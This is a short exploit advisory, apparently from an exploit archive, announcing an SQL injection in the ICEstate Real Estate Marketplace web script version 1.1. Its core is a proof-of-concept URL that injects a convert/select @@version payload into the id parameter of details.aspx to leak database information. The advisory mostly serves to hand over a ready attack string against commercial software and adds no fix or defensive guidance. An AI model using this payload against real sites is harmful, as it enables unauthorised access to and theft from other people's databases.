\#'#/ (-.-) ------------------------------oOO---(_)---OOo----------------------------------- | ICEstate (Real Estate Marketplace) SQL Injection Vulnerability | -------------------------------------------------------------------------------- [!] Discovered: cr4wl3r [!] Site: http://bastardlabs.info [!] Download: http://icloudcenter.com/real-estate-marketplace-site.htm [!] Price: $55.99 [!] Version: 1.1 [!] Date: 2013-01-04 [!] Remote: yes [!] Tested: Ubuntu [!] Reference: http://bastardlabs.info/exploits/ICEstate.txt [!] Poc: [!] http://bastardlabs/icestatemarket/details.aspx?id=convert(int,(select+@@version));-- [!] Thanks to Hawke for nice song http://goo.gl/TLkEs :)